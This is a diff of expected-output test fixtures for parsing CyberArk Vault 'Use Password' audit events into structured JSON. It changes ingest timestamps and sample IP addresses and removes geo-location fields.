@@ -508,8 +472,8 @@ "event": { "severity": 2, "reason": "Because I say so", - "ingested": "2021-06-09T10:24:32.348999900Z", - "original": "\u003c5\u003e1 2021-03-11T17:54:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:49\",\"IsoTimestamp\":\"2021-03-11T17:54:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Because I say so\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374510200Z", + "original": "\u003c5\u003e1 2021-03-11T17:54:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse 
Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:49\",\"IsoTimestamp\":\"2021-03-11T17:54:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Because I say so\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -532,20 +496,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -568,7 +523,7 @@ }, "@timestamp": "2021-03-11T17:56:30.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -580,8 +535,8 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -589,20 +544,20 @@ "severity": "Info", "reason": "for fun", "iso_timestamp": "2021-03-11T17:56:30Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003efor fun\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n 
\u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003efor fun\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": 
"Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "10.0.2.2", "action": "Use Password", 
@@ -616,8 +571,8 @@ "event": { "severity": 2, "reason": "for fun", - "ingested": "2021-06-09T10:24:32.349002400Z", - "original": "\u003c5\u003e1 2021-03-11T17:56:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efor fun\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:30\",\"IsoTimestamp\":\"2021-03-11T17:56:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"for fun\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374516Z", + "original": "\u003c5\u003e1 2021-03-11T17:56:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n 
\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efor fun\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:30\",\"IsoTimestamp\":\"2021-03-11T17:56:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"for fun\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -640,20 +595,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -676,7 +622,7 @@ }, "@timestamp": "2021-03-11T20:23:17.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -688,8 +634,8 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -697,20 +643,20 @@ "severity": "Info", "reason": "testing", "iso_timestamp": "2021-03-11T20:23:17Z", - "gateway_station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003etesting\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n 
\u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003etesting\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": 
"Administrator",
 "rfc5424": true,
 "ca_properties": {
 "other": {},
 "device_type": "Operating System",
- "address": "34.123.103.115",
+ "address": "67.43.156.15",
 "creation_method": "PVWA",
 "policy_id": "UnixSSHKeys",
 "user_name": "adrian"
 },
- "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
+ "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian",
 "safe": "PSM",
 "station": "10.0.2.2",
 "action": "Use Password",
@@ -724,8 +670,8 @@ "event": { "severity": 2, "reason": "testing", - "ingested": "2021-06-09T10:24:32.349004900Z", - "original": "\u003c5\u003e1 2021-03-11T20:23:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003etesting\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
